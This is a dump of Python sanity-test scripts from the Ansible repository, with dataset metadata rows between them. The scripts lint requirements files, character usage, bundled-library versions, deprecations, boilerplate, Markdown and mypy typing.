            pathlib.Path(clean_repo_dir, changelog_path).touch()
            complete_file_list.append(changelog_path)
        expected_sdist_files = collect_sdist_files(complete_file_list)
        expected_wheel_files = collect_wheel_files(complete_file_list)
        with tempfile.TemporaryDirectory() as tmp_dir:
            sdist_path, wheel_path = build(clean_repo_dir, tmp_dir)
            actual_sdist_files = list_sdist(sdist_path)
            actual_wheel_files = list_wheel(wheel_path)
            errors.extend(check_files('sdist', expected_sdist_files, actual_sdist_files))
            errors.extend(check_files('wheel', expected_wheel_files, actual_wheel_files))
    # Tag each error with the setuptools version so failures identify which pin was tested.
    errors = [f'{msg} ({setuptools_version})' for msg in errors]
    return errors
if __name__ == '__main__':
main()
| 7,756
|
Python
|
.py
| 169
| 39.12426
| 145
| 0.662633
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,076
|
test-constraints.py
|
ansible_ansible/test/sanity/code-smell/test-constraints.py
|
from __future__ import annotations
import os
import pathlib
import re
import sys
def main():
    """Validate that test requirements are pinned/constrained in the right files.

    Fix: the ``requirements`` dict was shadowed by the per-file list used as the
    second loop's target, which made the code fragile and confusing; the loop
    variable is now ``file_requirements``. The pin-detection regex is also
    compiled once instead of being re-parsed for every requirement line.
    """
    constraints_path = 'test/lib/ansible_test/_data/requirements/constraints.txt'
    # Matches an exact pin such as `== 1.2.3`, `== 1.2.3rc1` or `== 1.2.3.post1`.
    pinned_pattern = re.compile('^ *== *[0-9.]+(rc[0-9]+)?(\\.post[0-9]+)?$')
    requirements_by_path = {}
    for path in sys.argv[1:] or sys.stdin.read().splitlines():
        if path == 'test/lib/ansible_test/_data/requirements/ansible.txt':
            # This file is an exact copy of the ansible requirements.txt and should not conflict with other constraints.
            continue
        with open(path, 'r') as path_fd:
            requirements_by_path[path] = parse_requirements(path_fd.read().splitlines())
        if path == 'test/lib/ansible_test/_data/requirements/ansible-test.txt':
            # Special handling is required for ansible-test's requirements file.
            check_ansible_test(path, requirements_by_path.pop(path))
            continue
    frozen_sanity = {}
    non_sanity_requirements = set()
    for path, file_requirements in requirements_by_path.items():
        filename = os.path.basename(path)
        is_sanity = filename.startswith('sanity.') or filename.endswith('.requirements.txt')
        is_constraints = path == constraints_path
        for lineno, line, requirement in file_requirements:
            if not requirement:
                print('%s:%d:%d: cannot parse requirement: %s' % (path, lineno, 1, line))
                continue
            name = requirement.group('name').lower()
            raw_constraints = requirement.group('constraints')
            constraints = raw_constraints.strip()
            comment = requirement.group('comment')
            is_pinned = pinned_pattern.search(constraints)
            if is_sanity:
                sanity = frozen_sanity.setdefault(name, [])
                sanity.append((path, lineno, line, requirement))
            elif not is_constraints:
                non_sanity_requirements.add(name)
            if is_sanity:
                if not is_pinned:
                    # sanity test requirements must be pinned
                    print('%s:%d:%d: sanity test requirement (%s%s) must be frozen (use `==`)' % (path, lineno, 1, name, raw_constraints))
                continue
            if constraints and not is_constraints:
                allow_constraints = 'sanity_ok' in comment
                if not allow_constraints:
                    # keeping constraints for tests other than sanity tests in one file helps avoid conflicts
                    print('%s:%d:%d: put the constraint (%s%s) in `%s`' % (path, lineno, 1, name, raw_constraints, constraints_path))
def check_ansible_test(path: str, requirements: list[tuple[int, str, re.Match]]) -> None:
    """Verify ansible-test's requirements file exactly matches the expected coverage pins.

    Fix: the original iterated with ``enumerate`` but never used the index;
    the triples are now unpacked directly (the parsed match is unused here).

    :param path: requirements file path, used to prefix diagnostics
    :param requirements: parsed (lineno, line, match) triples from parse_requirements
    """
    sys.path.insert(0, str(pathlib.Path(__file__).parent.parent.parent.joinpath('lib')))
    from ansible_test._internal.coverage_util import COVERAGE_VERSIONS
    from ansible_test._internal.util import version_to_str
    expected_lines = set((
        f"coverage == {item.coverage_version} ; python_version >= '{version_to_str(item.min_python)}' and python_version <= '{version_to_str(item.max_python)}'"
        for item in COVERAGE_VERSIONS
    ))
    for lineno, line, _match in requirements:
        if line in expected_lines:
            expected_lines.remove(line)
            continue
        print('%s:%d:%d: unexpected line: %s' % (path, lineno, 1, line))
    # Report expected entries that never appeared, anchored just past the file's last line.
    for expected_line in sorted(expected_lines):
        print('%s:%d:%d: missing line: %s' % (path, requirements[-1][0] + 1, 1, expected_line))
def parse_requirements(lines):
    """Parse requirement lines into (line number, text, regex match) triples.

    Blank lines, comment lines and git URLs are dropped. A triple's match is
    None when the line could not be parsed as a requirement.
    """
    # see https://www.python.org/dev/peps/pep-0508/#names
    name_pattern = re.compile(
        r'^(?P<name>[A-Z0-9][A-Z0-9._-]*[A-Z0-9]|[A-Z0-9])(?P<extras> *\[[^]]*])?(?P<constraints>[^;#]*)(?P<markers>[^#]*)(?P<comment>.*)$',
        re.IGNORECASE,
    )
    parsed = []
    for lineno, line in enumerate(lines, start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith('#'):
            continue
        if line.startswith('git+https://'):
            continue  # hack to ignore git requirements
        parsed.append((lineno, line, name_pattern.search(line)))
    return parsed
if __name__ == '__main__':
main()
| 4,330
|
Python
|
.py
| 81
| 43.160494
| 160
| 0.614764
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,077
|
no-unwanted-characters.py
|
ansible_ansible/test/sanity/code-smell/no-unwanted-characters.py
|
"""Disallow use of unwanted Unicode characters."""
from __future__ import annotations
import re
import sys
def main():
    """Report Unicode no-break spaces (and undecodable bytes) in the given files."""
    for path in sys.argv[1:] or sys.stdin.read().splitlines():
        with open(path, 'rb') as path_fd:
            for lineno, raw in enumerate(path_fd.readlines(), start=1):
                try:
                    decoded = raw.decode('utf-8')
                except UnicodeDecodeError as ex:
                    print('%s:%d:%d: UnicodeDecodeError: %s' % (path, lineno, ex.start + 1, ex))
                    continue
                found = re.search('(\u00a0)', decoded)
                if found:
                    print('%s:%d:%d: use an ASCII space instead of a Unicode no-break space' % (
                        path, lineno, found.start(1) + 1))
if __name__ == '__main__':
main()
| 841
|
Python
|
.py
| 20
| 30.7
| 98
| 0.518428
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,078
|
mypy.requirements.in
|
ansible_ansible/test/sanity/code-smell/mypy.requirements.in
|
mypy
cryptography # type stubs not published separately
jinja2 # type stubs not published separately
packaging # type stubs not published separately
pytest # type stubs not published separately
tomli # type stubs not published separately, required for toml inventory plugin
types-backports
types-paramiko
types-pyyaml
types-requests
types-setuptools # required for the pkg_resources import in the pip module
types-toml
| 425
|
Python
|
.py
| 12
| 34.416667
| 80
| 0.842615
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,079
|
release-names.py
|
ansible_ansible/test/sanity/code-smell/release-names.py
|
# -*- coding: utf-8 -*-
# (c) 2019, Ansible Project
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
Test that the release name is present in the list of used up release names
"""
from __future__ import annotations
import pathlib
from ansible.release import __codename__
def main():
    """Entrypoint to the script"""
    releases = pathlib.Path('.github/RELEASE_NAMES.txt').read_text().splitlines()
    # Why this format? The file's sole purpose is to be read by a human when they need to know
    # which release names have already been used. So:
    # 1) It's easier for a human to find the release names when there's one on each line
    # 2) It helps keep other people from using the file and then asking for new features in it
    known_names = (entry.split(maxsplit=1)[1] for entry in releases)
    if not any(name == __codename__ for name in known_names):
        print(f'.github/RELEASE_NAMES.txt: Current codename {__codename__!r} not present in the file')
if __name__ == '__main__':
main()
| 1,616
|
Python
|
.py
| 37
| 40.675676
| 102
| 0.719567
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,080
|
update-bundled.py
|
ansible_ansible/test/sanity/code-smell/update-bundled.py
|
# -*- coding: utf-8 -*-
# (c) 2018, Ansible Project
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
This test checks whether the libraries we're bundling are out of date and need to be synced with
a newer upstream release.
"""
from __future__ import annotations
import fnmatch
import json
import re
import sys
from ansible.module_utils.compat.version import LooseVersion
import packaging.specifiers
from ansible.module_utils.urls import open_url
BUNDLED_RE = re.compile(b'\\b_BUNDLED_METADATA\\b')
def get_bundled_libs(paths):
    """
    Return the set of known bundled libraries

    :arg paths: The paths which the test has been instructed to check
    :returns: The list of all files which we know to contain bundled libraries.  If a bundled
        library consists of multiple files, this should be the file which has metadata included.
    """
    # These two are always bundled, regardless of the paths under test.
    known = {
        'lib/ansible/module_utils/distro/__init__.py',
        'lib/ansible/module_utils/six/__init__.py',
    }
    # Every compat package shipped under lib/ansible/compat/ is also bundled.
    known.update(fnmatch.filter(paths, 'lib/ansible/compat/*/__init__.py'))
    return known
def get_files_with_bundled_metadata(paths):
    """
    Search for any files which have bundled metadata inside of them

    :arg paths: Iterable of filenames to search for metadata inside of
    :returns: A set of pathnames which contained metadata
    """
    found = set()
    for candidate in paths:
        with open(candidate, 'rb') as handle:
            contents = handle.read()
        if BUNDLED_RE.search(contents):
            found.add(candidate)
    return found
def get_bundled_metadata(filename):
    """
    Retrieve the metadata about a bundled library from a python file

    :arg filename: The filename to look inside for the metadata
    :raises ValueError: If we're unable to extract metadata from the file
    :returns: The metadata from the python file, or None when the file is marked
        as not bundled or not updatable
    """
    data = None
    with open(filename, 'r') as module:
        for line in module:
            stripped = line.strip()
            if stripped.startswith('# NOT_BUNDLED'):
                return None
            if stripped.startswith('# CANT_UPDATE'):
                print(
                    '{0} marked as CANT_UPDATE, so skipping. Manual '
                    'check for CVEs required.'.format(filename))
                return None
            if stripped.startswith('_BUNDLED_METADATA'):
                # The metadata is a JSON dict literal assigned on this line.
                data = line[line.index('{'):].strip()
                break
    if data is None:
        raise ValueError('Unable to check bundled library for update. Please add'
                         ' _BUNDLED_METADATA dictionary to the library file with'
                         ' information on pypi name and bundled version.')
    return json.loads(data)
def get_latest_applicable_version(pypi_data, constraints=None):
    """Get the latest pypi version of the package that we allow

    :arg pypi_data: Pypi information about the data as returned by
        ``https://pypi.org/pypi/{pkg_name}/json``
    :kwarg constraints: version constraints on what we're allowed to use as specified by
        the bundled metadata
    :returns: The most recent version on pypi that are allowed by ``constraints``
    """
    latest_version = "0"
    if constraints:
        version_specification = packaging.specifiers.SpecifierSet(constraints)
        # Scan every released version and keep the newest one that satisfies the constraints.
        # NOTE(review): ordering uses LooseVersion, so pre-release tags compare per
        # LooseVersion semantics rather than PEP 440 — confirm this is intended.
        for version in pypi_data['releases']:
            if version in version_specification:
                if LooseVersion(version) > LooseVersion(latest_version):
                    latest_version = version
    else:
        # With no constraints, trust pypi's own notion of the current version.
        latest_version = pypi_data['info']['version']
    return latest_version
def main():
    """Entrypoint to the script.

    Bug fix: the ``except (IOError, OSError)`` handler previously fell through
    without a ``continue``, so the subsequent ``if metadata is None`` check ran
    with ``metadata`` unbound (NameError on the first iteration) or stale from
    a previous iteration. Errors other than ENOENT were also silently swallowed;
    they are now re-raised.
    """
    paths = sys.argv[1:] or sys.stdin.read().splitlines()
    bundled_libs = get_bundled_libs(paths)
    files_with_bundled_metadata = get_files_with_bundled_metadata(paths)
    # Files advertising bundled metadata must be tracked in the known list above.
    for filename in files_with_bundled_metadata.difference(bundled_libs):
        if filename.startswith('test/support/'):
            continue  # bundled support code does not need to be updated or tracked
        print('{0}: ERROR: File contains _BUNDLED_METADATA but needs to be added to'
              ' test/sanity/code-smell/update-bundled.py'.format(filename))
    for filename in bundled_libs:
        try:
            metadata = get_bundled_metadata(filename)
        except ValueError as e:
            print('{0}: ERROR: {1}'.format(filename, e))
            continue
        except (IOError, OSError) as e:
            if e.errno == 2:
                print('{0}: ERROR: {1}. Perhaps the bundled library has been removed'
                      ' or moved and the bundled library test needs to be modified as'
                      ' well?'.format(filename, e))
                continue  # skip this file instead of using an unbound/stale `metadata`
            raise
        if metadata is None:
            continue
        pypi_fh = open_url('https://pypi.org/pypi/{0}/json'.format(metadata['pypi_name']))
        pypi_data = json.loads(pypi_fh.read().decode('utf-8'))
        constraints = metadata.get('version_constraints', None)
        latest_version = get_latest_applicable_version(pypi_data, constraints)
        if LooseVersion(metadata['version']) < LooseVersion(latest_version):
            print('{0}: UPDATE {1} from {2} to {3} {4}'.format(
                filename,
                metadata['pypi_name'],
                metadata['version'],
                latest_version,
                'https://pypi.org/pypi/{0}/json'.format(metadata['pypi_name'])))
if __name__ == '__main__':
main()
| 6,141
|
Python
|
.py
| 135
| 37.614815
| 96
| 0.657895
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,081
|
deprecated-config.py
|
ansible_ansible/test/sanity/code-smell/deprecated-config.py
|
# -*- coding: utf-8 -*-
# (c) 2018, Matt Martz <matt@sivel.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import annotations
import mmap
import os
import re
import sys
from ansible.module_utils.compat.version import StrictVersion
import yaml
import ansible.config
from ansible.plugins.loader import fragment_loader
from ansible.release import __version__ as ansible_version
from ansible.utils.plugin_docs import get_docstring
DOC_RE = re.compile(b'^DOCUMENTATION', flags=re.M)
ANSIBLE_MAJOR = StrictVersion('.'.join(ansible_version.split('.')[:2]))
def find_deprecations(obj, path=None):
    """Recursively yield (path, version) pairs for expired 'deprecated' entries.

    Walks nested dicts and lists looking for keys named 'deprecated' whose
    'version' (or fallback 'removed_in') is at or below the current major
    ansible version.

    :arg obj: nested dict/list structure to walk; other types are ignored
    :kwarg path: key path accumulated so far (internal recursion state)
    """
    if not isinstance(obj, (list, dict)):
        return
    try:
        items = obj.items()
    except AttributeError:
        # Not a mapping; iterate lists as (index, value) pairs instead.
        items = enumerate(obj)
    for key, value in items:
        if path is None:
            this_path = []
        else:
            this_path = path[:]
        this_path.append(key)
        if key != 'deprecated':
            yield from find_deprecations(value, path=this_path)
        else:
            try:
                version = value['version']
                this_path.append('version')
            except KeyError:
                # Some entries use 'removed_in' instead of 'version'.
                version = value['removed_in']
                this_path.append('removed_in')
            # Only report deprecations that should already have been removed.
            if StrictVersion(version) <= ANSIBLE_MAJOR:
                yield (this_path, version)
def main():
    """Report plugin and base.yml config deprecations scheduled for removal."""
    plugins = []
    # Pre-filter to files whose bytes contain a DOCUMENTATION block, using mmap
    # to avoid reading whole files into memory.
    for path in sys.argv[1:] or sys.stdin.read().splitlines():
        with open(path, 'rb') as f:
            try:
                mm_file = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
            except ValueError:
                # mmap rejects zero-length files; such files have no DOCUMENTATION.
                continue
            if DOC_RE.search(mm_file):
                plugins.append(path)
            mm_file.close()
    for plugin in plugins:
        data = {}
        data['doc'], data['examples'], data['return'], data['metadata'] = get_docstring(plugin, fragment_loader)
        for result in find_deprecations(data['doc']):
            print(
                '%s: %s is scheduled for removal in %s' % (plugin, '.'.join(str(i) for i in result[0][:-2]), result[1])
            )
    # Also check the base config definitions shipped with ansible-core.
    base = os.path.join(os.path.dirname(ansible.config.__file__), 'base.yml')
    root_path = os.path.dirname(os.path.dirname(os.path.dirname(ansible.__file__)))
    relative_base = os.path.relpath(base, root_path)
    with open(base) as f:
        data = yaml.safe_load(f)
    for result in find_deprecations(data):
        print('%s: %s is scheduled for removal in %s' % (relative_base, '.'.join(str(i) for i in result[0][:-2]), result[1]))
if __name__ == '__main__':
main()
| 3,208
|
Python
|
.py
| 81
| 32.765432
| 125
| 0.636832
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,082
|
required-and-default-attributes.py
|
ansible_ansible/test/sanity/code-smell/required-and-default-attributes.py
|
from __future__ import annotations
import re
import sys
def main():
    """Flag FieldAttribute declarations that combine `default` and `required`.

    Improvement: the regex is compiled once up front instead of being looked up
    through the `re` cache for every line of every file.
    """
    pattern = re.compile(r'(FieldAttribute.*(default|required).*(default|required))')
    for path in sys.argv[1:] or sys.stdin.read().splitlines():
        with open(path, 'r') as path_fd:
            for line, text in enumerate(path_fd.readlines()):
                match = pattern.search(text)
                if match:
                    print('%s:%d:%d: use only one of `default` or `required` with `FieldAttribute`' % (
                        path, line + 1, match.start(1) + 1))
if __name__ == '__main__':
main()
| 570
|
Python
|
.py
| 13
| 34.384615
| 103
| 0.560799
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,083
|
mypy.requirements.txt
|
ansible_ansible/test/sanity/code-smell/mypy.requirements.txt
|
# edit "mypy.requirements.in" and generate with: hacking/update-sanity-requirements.py --test mypy
cffi==1.17.1
cryptography==43.0.1
iniconfig==2.0.0
Jinja2==3.1.4
MarkupSafe==2.1.5
mypy==1.11.2
mypy-extensions==1.0.0
packaging==24.1
pluggy==1.5.0
pycparser==2.22
pytest==8.3.3
tomli==2.0.2
types-backports==0.1.3
types-paramiko==3.5.0.20240928
types-PyYAML==6.0.12.20240917
types-requests==2.32.0.20240914
types-setuptools==75.1.0.20240917
types-toml==0.10.8.20240310
typing_extensions==4.12.2
urllib3==2.2.3
| 510
|
Python
|
.py
| 21
| 23.285714
| 98
| 0.773006
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,084
|
boilerplate.py
|
ansible_ansible/test/sanity/code-smell/boilerplate.py
|
from __future__ import annotations
import ast
import sys
def main():
    """Check that each given Python file carries the annotations-import boilerplate."""
    for path in sys.argv[1:] or sys.stdin.read().splitlines():
        with open(path, 'rb') as path_fd:
            lines = path_fd.read().splitlines()
            missing = True
            if not lines:
                # Files are allowed to be empty of everything including boilerplate
                missing = False
            invalid_future = []
            for text in lines:
                # Only these exact spellings satisfy the boilerplate requirement.
                if text in (
                    b'from __future__ import annotations',
                    b'from __future__ import annotations as _annotations',
                    b'from __future__ import annotations # pragma: nocover',
                ):
                    missing = False
                    break
                if text.strip().startswith(b'from __future__ ') or text.strip().startswith(b'__metaclass__ '):
                    # Any other future import (or legacy metaclass assignment) is reported below.
                    invalid_future.append(text.decode())
            if missing:
                with open(path) as file:
                    contents = file.read()
                # noinspection PyBroadException
                try:
                    node = ast.parse(contents)
                    # files consisting of only assignments have no need for future import boilerplate
                    # the most likely case is that of a documentation only python file
                    if all(isinstance(statement, ast.Assign) for statement in node.body):
                        missing = False
                except Exception:  # pylint: disable=broad-except
                    pass  # the compile sanity test will report this error
            if missing:
                print('%s: missing: from __future__ import annotations' % path)
            for text in invalid_future:
                print('%s: invalid: %s' % (path, text))
if __name__ == '__main__':
main()
| 1,756
|
Python
|
.py
| 40
| 31.85
| 106
| 0.562867
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,085
|
no-unwanted-files.py
|
ansible_ansible/test/sanity/code-smell/no-unwanted-files.py
|
"""Prevent unwanted files from being added to the source tree."""
from __future__ import annotations
import os
import sys
def main():
    """Main entry point."""
    paths = sys.argv[1:] or sys.stdin.read().splitlines()
    allowed_extensions = (
        '.cs',
        '.ps1',
        '.psm1',
        '.py',
    )
    skip_paths = {
        'lib/ansible/config/ansible_builtin_runtime.yml',  # not included in the sanity ignore file since it won't exist until after migration
    }
    skip_directories = (
        'lib/ansible/galaxy/data/',
    )
    yaml_directories = ('lib/ansible/plugins/test', 'lib/ansible/plugins/filter')
    for path in paths:
        if path in skip_paths:
            continue
        if path.startswith(skip_directories):
            continue
        if path.startswith('lib/') and not path.startswith('lib/ansible/'):
            print('%s: all "lib" content must reside in the "lib/ansible" directory' % path)
            continue
        extension = os.path.splitext(path)[1]
        # YAML is only allowed for the test and filter plugin directories.
        if extension == '.yml' and path.startswith(yaml_directories):
            continue
        if extension not in allowed_extensions:
            print('%s: extension must be one of: %s' % (path, ', '.join(allowed_extensions)))
if __name__ == '__main__':
main()
| 1,359
|
Python
|
.py
| 35
| 31.371429
| 142
| 0.614504
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,086
|
obsolete-files.py
|
ansible_ansible/test/sanity/code-smell/obsolete-files.py
|
"""Prevent files from being added to directories that are now obsolete."""
from __future__ import annotations
import os
import sys
def main():
    """Main entry point."""
    for path in sys.argv[1:] or sys.stdin.read().splitlines():
        # Every path handed to this test lives in an obsolete directory, so each one is an error.
        directory = os.path.dirname(path)
        print('%s: directory "%s/" is obsolete and should not contain any files' % (path, directory))
main()
| 410
|
Python
|
.py
| 11
| 33.545455
| 113
| 0.664122
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,087
|
ansible-requirements.py
|
ansible_ansible/test/sanity/code-smell/ansible-requirements.py
|
from __future__ import annotations
import re
def read_file(path):
    """Return the contents of *path*, or None (after printing a diagnostic) on any failure."""
    try:
        with open(path, 'r') as handle:
            contents = handle.read()
    except Exception as ex:  # pylint: disable=broad-except
        print('%s:%d:%d: unable to read required file %s' % (path, 0, 0, re.sub(r'\s+', ' ', str(ex))))
        return None
    return contents
def main():
    """Verify the vendored copy of requirements.txt is identical to the original."""
    original_path = 'requirements.txt'
    vendored_path = 'test/lib/ansible_test/_data/requirements/ansible.txt'
    original = read_file(original_path)
    vendored = read_file(vendored_path)
    # read_file already reported any read failure; nothing further to compare.
    if original is None or vendored is None:
        return
    if original != vendored:
        print('%s:%d:%d: must be identical to %s' % (vendored_path, 0, 0, original_path))
main()
| 834
|
Python
|
.py
| 19
| 37.789474
| 103
| 0.651365
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,088
|
pymarkdown.py
|
ansible_ansible/test/sanity/code-smell/pymarkdown.py
|
"""Sanity test for Markdown files."""
from __future__ import annotations
import pathlib
import re
import subprocess
import sys
import typing as t
def main() -> None:
    """Run pymarkdown over the given paths and reformat its findings for sanity output."""
    paths = sys.argv[1:] or sys.stdin.read().splitlines()
    # Invoke pymarkdown as a module with a pinned config so results are reproducible.
    cmd = [
        sys.executable,
        '-m', 'pymarkdown',
        '--config', pathlib.Path(__file__).parent / 'pymarkdown.config.json',
        '--strict-config',
        'scan',
    ] + paths
    process = subprocess.run(
        cmd,
        stdin=subprocess.DEVNULL,
        capture_output=True,
        check=False,
        text=True,
    )
    # Anything on stderr indicates the tool itself failed, not a lint finding.
    if process.stderr:
        print(process.stderr.strip(), file=sys.stderr)
        sys.exit(1)
    if not (stdout := process.stdout.strip()):
        return
    # Findings look like: "path:line:col: CODE: message (alias, alias)".
    pattern = re.compile(r'^(?P<path_line_column>[^:]*:[0-9]+:[0-9]+): (?P<code>[^:]*): (?P<message>.*) \((?P<aliases>.*)\)$')
    matches = parse_to_list_of_dict(pattern, stdout)
    # Report using the first (human friendly) alias instead of the MD code.
    results = [f"{match['path_line_column']}: {match['aliases'].split(', ')[0]}: {match['message']}" for match in matches]
    print('\n'.join(results))
def parse_to_list_of_dict(pattern: re.Pattern, value: str) -> list[dict[str, t.Any]]:
    """Match every line of *value* against *pattern* and return the groupdicts.

    Raises an Exception listing any lines the pattern failed to match.
    """
    results = []
    failures = []
    for candidate in value.splitlines():
        found = re.search(pattern, candidate)
        if found:
            results.append(found.groupdict())
        else:
            failures.append(candidate)
    if failures:
        raise Exception(f'Pattern {pattern!r} did not match values:\n' + '\n'.join(failures))
    return results
if __name__ == '__main__':
main()
| 1,568
|
Python
|
.py
| 46
| 27.73913
| 126
| 0.595745
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,089
|
mypy.json
|
ansible_ansible/test/sanity/code-smell/mypy.json
|
{
"prefixes": [
"lib/ansible/",
"test/lib/ansible_test/_internal/",
"packaging/",
"test/units",
"test/lib/ansible_test/_util/target/sanity/import/"
],
"extensions": [
".py"
],
"multi_version": "controller",
"error_code": "ansible-test",
"output": "path-line-column-code-message"
}
| 357
|
Python
|
.py
| 15
| 17.733333
| 59
| 0.546784
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,090
|
mypy.py
|
ansible_ansible/test/sanity/code-smell/mypy.py
|
"""Sanity test which executes mypy."""
from __future__ import annotations
import dataclasses
import os
import pathlib
import re
import subprocess
import sys
import typing as t
vendored_paths = (
'lib/ansible/module_utils/six/__init__.py',
'lib/ansible/module_utils/distro/_distro.py',
)
config_dir = pathlib.Path(__file__).parent / 'mypy'
def main() -> None:
    """Run mypy across each applicable context and print normalized error messages."""
    paths = sys.argv[1:] or sys.stdin.read().splitlines()
    # Vendored sources are third-party code and are not held to our typing standards.
    paths = [path for path in paths if path not in vendored_paths]  # FUTURE: define the exclusions in config so the paths can be skipped earlier
    if not paths:
        return
    python_version = os.environ['ANSIBLE_TEST_TARGET_PYTHON_VERSION']
    controller_python_versions = os.environ['ANSIBLE_TEST_CONTROLLER_PYTHON_VERSIONS'].split(',')
    remote_only_python_versions = os.environ['ANSIBLE_TEST_REMOTE_ONLY_PYTHON_VERSIONS'].split(',')
    # Each context pairs a mypy config name with the path prefixes it covers and
    # the python versions under which it should run.
    contexts = (
        MyPyContext('ansible-test', ['test/lib/ansible_test/_util/target/sanity/import/'], controller_python_versions),
        MyPyContext('ansible-test', ['test/lib/ansible_test/_internal/'], controller_python_versions),
        MyPyContext('ansible-core', ['lib/ansible/'], controller_python_versions),
        MyPyContext('modules', ['lib/ansible/modules/', 'lib/ansible/module_utils/'], remote_only_python_versions),
        MyPyContext('packaging', ['packaging/'], controller_python_versions),
        MyPyContext('modules', ['test/units/modules/', 'test/units/module_utils/'], remote_only_python_versions),
        MyPyContext('ansible-core', ['test/units/'], controller_python_versions),
    )
    unfiltered_messages: list[SanityMessage] = []
    for context in contexts:
        if python_version not in context.python_versions:
            continue
        unfiltered_messages.extend(test_context(python_version, context, paths))
    notices = []
    messages = []
    for message in unfiltered_messages:
        if message.level != 'error':
            notices.append(message)
            continue
        # Error messages end with "  [error-code]"; split the code into its own field.
        # NOTE(review): assumes every error-level message matches this shape — a
        # non-matching message would leave `match` as None and raise AttributeError.
        match = re.search(r'^(?P<message>.*) {2}\[(?P<code>.*)]$', message.message)
        messages.append(SanityMessage(
            message=match.group('message'),
            path=message.path,
            line=message.line,
            column=message.column,
            level=message.level,
            code=match.group('code'),
        ))
    # FUTURE: provide a way for script based tests to report non-error messages (in this case, notices)
    # The following error codes from mypy indicate that results are incomplete.
    # That prevents the test from completing successfully, just as if mypy were to traceback or generate unexpected output.
    fatal_error_codes = {
        'import',
        'syntax',
    }
    fatal_errors = [message for message in messages if message.code in fatal_error_codes]
    if fatal_errors:
        error_message = '\n'.join(error.format() for error in fatal_errors)
        raise Exception(f'Encountered {len(fatal_errors)} fatal errors reported by mypy:\n{error_message}')
    paths_set = set(paths)
    # Only report messages for paths that were specified as targets.
    # Imports in our code are followed by mypy in order to perform its analysis, which is important for accurate results.
    # However, it will also report issues on those files, which is not the desired behavior.
    messages = [message for message in messages if message.path in paths_set]
    for message in messages:
        print(message.format())
def test_context(
    python_version: str,
    context: MyPyContext,
    paths: list[str],
) -> list[SanityMessage]:
    """Run mypy tests for the specified context.

    :param python_version: python version passed to mypy via --python-version
    :param context: the config name, path prefixes and python versions to test
    :param paths: candidate paths; only those under the context's prefixes are tested
    :returns: parsed mypy output as SanityMessage objects (error codes are extracted later)
    """
    context_paths = [path for path in paths if any(path.startswith(match_path) for match_path in context.paths)]
    if not context_paths:
        return []
    config_path = config_dir / f'{context.name}.ini'
    # FUTURE: provide a way for script based tests to report progress and other diagnostic information
    # display.info(f'Checking context "{context.name}"', verbosity=1)
    env = os.environ.copy()
    env['MYPYPATH'] = env['PYTHONPATH']
    # The --no-site-packages option should not be used, as it will prevent loading of type stubs from the sanity test virtual environment.
    # Enabling the --warn-unused-configs option would help keep the config files clean.
    # However, the option can only be used when all files in tested contexts are evaluated.
    # Unfortunately sanity tests have no way of making that determination currently.
    # The option is also incompatible with incremental mode and caching.
    cmd = [
        # Below are arguments common to all contexts.
        # They are kept here to avoid repetition in each config file.
        sys.executable,
        '-m', 'mypy',
        '--show-column-numbers',
